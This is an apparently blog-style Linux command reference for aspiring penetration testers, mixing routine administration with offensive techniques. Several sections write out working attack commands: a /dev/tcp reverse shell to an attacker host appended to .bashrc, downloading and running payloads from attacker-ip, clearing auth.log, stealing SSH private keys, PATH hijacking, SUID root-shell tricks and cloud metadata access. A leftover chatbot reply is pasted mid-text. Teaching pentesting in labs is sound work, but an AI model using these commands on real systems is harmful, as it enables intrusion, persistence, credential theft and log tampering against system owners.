Essential Linux Administration Commands
Outline
- Introduction
- Why Pentesters Must Learn Linux
- Navigating the Filesystem
- Managing Files and Directories
- Users and Groups
- Permissions, SUID, and Ownership
- Process and Service Management
- Networking Essentials
- Searching Files and Information
- Privilege Escalation: Enumeration and Tricks
- Cron Jobs (Persistence & Escalation)
- Sensitive Files and Histories
- File Editing and Scripting
- Persistence via .bashrc
- Package Management (Debian)
- Log Files and Monitoring
- Disk and Filesystem Management
- Binary Capabilities (getcap)
- Shell Escaping
- Working with /tmp
- Downloading Files from the Internet
- Curl (HTTP Requests and Downloads)
- SSH (Secure Shell)
- SUID/SGID Binaries (Advanced Privilege Escalation)
- Final Thoughts
1.Introduction
This post is a curated list of practical Linux commands and techniques that every aspiring penetration tester should know. It covers everything from file enumeration and privilege escalation to persistence and log analysis — the kind of stuff you’ll actually use in real-world scenarios and CTFs.
However, I’ll leave a link to a video series by NetworkChuck. I think it’s a great place to start if you are a complete beginner, and you can use this post more as a reference guide afterward. Watch it Here. This guide is built to be both a learning tool and a quick-access checklist like its been for me.
2.Why Pentesters Must Learn Linux
You’ll need Linux knowledge to:
- Enumerate targets effectively
- Maintain access and persistence
- Escalate privileges from user to root
- Modify system behavior and configs
- Use and understand your own tools
3. Navigating the Filesystem
pwd # Show current directory
ls # List files
ls -la # Long list with hidden files
cd /etc # Change directory
cd ~ # Go to home
cd .. # Up one level
tree # (Optional) Visualize file structure
Install tree if needed:
sudo apt install tree
4. Managing Files and Directories
touch notes.txt # Create file
mkdir recon # Create directory
cp file.txt /tmp/ # Copy file
mv old.txt new.txt # Rename or move
rm file.txt # Remove file
rm -r folder/ # Remove folder
5. Users and Groups
whoami # Current user
id # UID and group info
groups # Show groups
sudo adduser testuser # Create user
sudo passwd testuser # Set password
su username # Switch user
sudo -l # Show sudo rights
6. Permissions, SUID, and Ownership
ls -l # File permissions
chmod +x file.sh # Make file executable
chmod 755 file.sh # rwxr-xr-x
chmod u+s /bin/bash # Add SUID
chown user:group file # Change ownership
7. Process and Service Management
ps aux # Show running processes
top # Dynamic process list
htop # (Better process viewer)
kill PID # Kill process
killall name # Kill by name
systemctl status ssh # Service status
systemctl restart apache2
Install htop if needed:
sudo apt install htop
8. Networking Essentials
ip a # Interfaces
ip r # Routes
ss -tuln # Listening ports
ping -c 4 domain.com # Test connectivity
dig domain.com # DNS info
nslookup domain.com # DNS info
traceroute domain.com # Trace path
nmap -sV -p- target # Port scan
Install nmap:
sudo apt install nmap
Absolutely — here’s your revised post with inline comments added using hashtags next to each command, explaining what they do. I’ve preserved the tone and structure:
9. Searching Files and Information
find / -name "id_rsa" 2>/dev/null # Search for private SSH keys
find / -perm -4000 2>/dev/null # Find SUID binaries (possible priv esc)
grep -i "password" *.conf # Search for passwords in config files
locate php.ini # Quickly find php.ini file
sudo updatedb # Update locate DB for faster searches
cat file.txt # Print file contents
less logfile.log # View file with scroll support
tail -f /var/log/syslog # Follow logs live (real-time monitoring)
10. Privilege Escalation: Enumeration and Tricks
uname -a # Kernel version and system info
cat /proc/version # Kernel version (alternative)
lsb_release -a # OS release info
cat /etc/issue # Distro information
echo $PATH # Show current PATH environment
env # Show all environment variables
Check $PATH for dangerous entries like . (current directory):
echo "/bin/sh" > /tmp/update # Create malicious script
chmod +x /tmp/update # Make it executable
export PATH=/tmp:$PATH # Add /tmp to the beginning of PATH
11. Cron Jobs (Persistence & Escalation)
cat /etc/crontab # View system-wide cron jobs
ls -la /etc/cron.* # List cron folders and files
Look for cron jobs that are:
- World-writable
- Owned by root
- Run frequently
These are prime candidates for privilege escalation.
12. Sensitive Files and Histories
cat ~/.bash_history # User’s command history
cat ~/.ssh/id_rsa # Private SSH key (loot!)
cat ~/.mysql_history # MySQL history (may have creds)
These often contain credentials or useful artifacts for lateral movement.
13. File Editing and Scripting
nano file.txt # Simple text editor
vim file.txt # Advanced text editor
Simple script example:
#!/bin/bash
for i in {1..3}; do
echo "Pentest time!"
done
Make it executable and run:
chmod +x script.sh # Make script executable
./script.sh # Execute the script
14. Persistence via .bashrc
echo "bash -i >& /dev/tcp/attacker-ip/4444 0>&1" >> ~/.bashrc
# Adds reverse shell to bashrc — runs on new shell
15. Package Management (Debian)
sudo apt update # Update package list
sudo apt install net-tools # Install net-tools (includes `ifconfig`)
sudo apt install nmap # Install nmap (network scanner)
which nmap # Show nmap binary path
whereis python3 # Locate python3 binary and man pages
16. Log Files and Monitoring
ls -lah /var/log # List log files with sizes
cat /var/log/auth.log # Authentication log (login attempts)
cat /var/log/syslog # System messages
cat /var/log/apache2/access.log # Apache access logs
echo "" > /var/log/auth.log # Clear logs (caution: may trigger alerts)
17. Disk and Filesystem Management
df -h # Disk usage in human-readable format
du -sh * # Disk usage of files/folders
mount # Show mounted filesystems
This helps find mount points and disk space that could be manipulated for persistence.
18. Binary Capabilities (Advanced PrivEsc)
getcap -r / 2>/dev/null # Find binaries with special capabilities
Look for capabilities like cap_setuid+ep — these can be abused similar to SUID.
To install the tool:
sudo apt install libcap2-bin # Install getcap utility
19. Shell Escaping (Breaking Out of Limited Shells)
python3 -c 'import pty; pty.spawn("/bin/bash")' # Spawn interactive bash shell
Then press:
CTRL + Z # Background current shell
stty raw -echo # Fix line discipline
fg # Return to shell
export TERM=xterm # Set proper terminal type
This improves usability in restricted shells, especially reverse shells.
20. Working with /tmp
cd /tmp # Change to tmp dir (world-writable)
wget http://attacker-ip/payload.sh # Download script from attacker
chmod +x payload.sh # Make script executable
./payload.sh # Execute it
The /tmp directory is writable by all users — great for exploits and scripts.
21. Downloading Files from the Internet
wget http://attacker-ip/file # Download a file using wget (simple and common on Linux systems)
curl -O http://attacker-ip/file # Download a file using curl and keep the original filename
Using netcat:
Attacker (serving file):
nc -lvnp 4444 < exploit.sh # Listen on port 4444 and serve exploit.sh to whoever connects
Victim (receiving file):
nc attacker-ip 4444 > exploit.sh # Connect to attacker and write output to exploit.sh
Using a Python HTTP Server:
Attacker:
python3 -m http.server 8000 # Starts a web server in the current directory on port 8000
Victim:
wget http://attacker-ip:8000/exploit.sh # Pulls exploit.sh from the attacker's Python HTTP server
curl -O http://attacker-ip:8000/exploit.sh # Same using curl
📌 Python HTTP servers are fast and flexible for serving files in internal networks or CTFs. Just make sure the firewall allows the port you’re using (8000 by default).
22. Using CURL for HTTP Requests and Downloads
curl (short for Client URL) is a command-line tool used to send and receive data using URLs. It’s one of the most useful utilities a pentester can have in their toolkit — not just for downloading payloads, but for interacting with web applications, APIs, and network services in a precise, controllable way.
Where tools like wget are great for simple file downloads, curl shines when you need to:
- Send crafted HTTP requests (GET, POST, PUT, DELETE, etc.)
- Add custom headers or cookies (great for bypassing filters or simulating browsers)
- Test for common web vulnerabilities (like Host header injection or SSRF)
- Pipe files directly in POST requests (exfil data or automate uploads)
- Work with REST APIs or check web services during enumeration
- Operate quietly in restricted environments
It’s also preinstalled on many Linux systems, making it ideal when you’re working on a target machine with limited tooling.
Basic File Download
curl -O http://attacker-ip/payload.sh # Download file (save with original name)
curl -o shell.sh http://attacker-ip/payload.sh # Download and save as shell.sh
POST Data to a Web Form
curl -X POST -d "username=admin&password=123" http://target/login.php
Send Custom Headers
curl -H "X-Forwarded-For: 127.0.0.1" http://target/
curl -H "User-Agent: evil" http://target/
Use Cookies (Session Hijacking, Testing Auth)
curl -b "PHPSESSID=abcdef123456" http://target/admin.php
Send JSON Data (REST APIs)
curl -X POST -H "Content-Type: application/json" -d '{"user":"admin","pass":"123"}' http://target/api/login
Test for Open Ports with curl (Banner Grabbing)
curl http://localhost:8080 # Web server check
curl -I http://target # Show HTTP headers (like response code, server info)
Access Internal Metadata Service (Cloud Enumeration / SSRF)
curl http://169.254.169.254/latest/meta-data/ # AWS metadata (very common in cloud attacks)
Use Proxy with curl (for anonymity or tunneling)
curl --proxy http://127.0.0.1:8080 http://target/
23. SSH (Secure Shell)
SSH is a protocol that lets you securely connect to remote machines over a network — it’s one of the most common ways pentesters move laterally, maintain access, or interact with compromised systems.
Basic SSH Usage
ssh user@hostname # Connect to a remote host by name
ssh user@192.168.1.10 # Connect using IP address
ssh -p 2222 user@target # Connect on a non-default port
Using an Identity File (Private Key)
ssh -i id_rsa user@target # Connect using a specific private key file
Useful when you’ve found private keys on the system (like id_rsa from ~/.ssh or found via find).
Copying Files with SCP (Secure Copy)
scp file.txt user@host:/tmp/ # Copy a local file to a remote system
scp user@host:/etc/passwd . # Copy a remote file to your local machine
Specify a non-default SSH port with -P:
scp -P 2222 file.txt user@host:/tmp/
SSH Tunneling (Port Forwarding)
ssh -L 8080:target:80 user@jumpbox # Forward local port 8080 to target:80 via jumpbox
This is useful for pivoting through a jumpbox with limited network access.
Enumerating SSH Config and Access
If you have access to a user’s home directory, check these files for valuable info:
cat ~/.ssh/authorized_keys # Public keys allowed for SSH login (good for persistence)
cat ~/.ssh/known_hosts # Hosts this user has connected to (internal IPs, hostnames)
cat ~/.ssh/config # Custom SSH client configs (may reveal internal hosts or identity files)
known_hostscan reveal internal network targets and potential pivot points.
Useful SSH Tips for Pentesters
- Add your public key for persistence:
echo "your_public_key" >> ~/.ssh/authorized_keys - Fix permissions on private keys before use:
chmod 600 id_rsa - Crack encrypted private keys using
johnorssh2john.py+john. - Use SSH agent forwarding for pivoting (cautiously):
ssh -A user@jumpbox - Pivot via modern ProxyJump:
ssh -J user@jumpbox user@target - Mount remote directories with SSHFS:
sshfs user@host:/remote/path /local/mountpoint - Disable SSH timeout for long sessions:
echo "ServerAliveInterval 60" >> ~/.ssh/config
24. SUID/SGID Binaries (Advanced Privilege Escalation)
SUID (Set User ID) and SGID (Set Group ID) binaries run with the privileges of their owner or group, not the user who executes them. This can be abused to escalate privileges if vulnerable binaries are found.
Finding SUID and SGID Binaries
find / -perm -4000 -type f 2>/dev/null # Find all SUID binaries (run as file owner)
find / -perm -2000 -type f 2>/dev/null # Find all SGID binaries (run as file group)
Why It Matters
If you find a vulnerable SUID/SGID binary, you might be able to execute commands with elevated privileges (often root).
Exploiting SUID Binaries Using GTFOBins
GTFOBins is a curated list of binaries that can be exploited when running with elevated privileges.
Example with nmap (if SUID and vulnerable):
which nmap
nmap --interactive
# In interactive mode, you can execute shell commands with elevated privileges
!sh
Other common SUID binaries to check:
findvimorvilessawkperlpython
Example exploitation with find:
find . -exec /bin/sh -p \; # Spawn a root shell if find is SUID
Checking Permissions and Owners
Look for suspicious or world-writable SUID/SGID files:
ls -l /path/to/binary # Check permissions and ownership
Final Tips for Privilege Escalation with SUID
- Always research the binary with GTFOBins before attempting exploitation.
- Not every SUID binary is exploitable, but every SUID binary is worth investigating.
- Abuse of SUID/SGID binaries is a common and reliable escalation vector in pentesting and CTFs.
25.Final Thoughts
If you’re serious about becoming a penetration tester, make this list your daily bread. Don’t just memorize commands — understand when and why to use them. Every line in this guide is something you’ll use in real-world assessments or CTF labs.
Use this post as:
- A reference manual
- A daily practice list
- A checklist for privilege escalation
Hack ethically, learn relentlessly, and practice everything in real environments like TryHackMe or HackTheBox
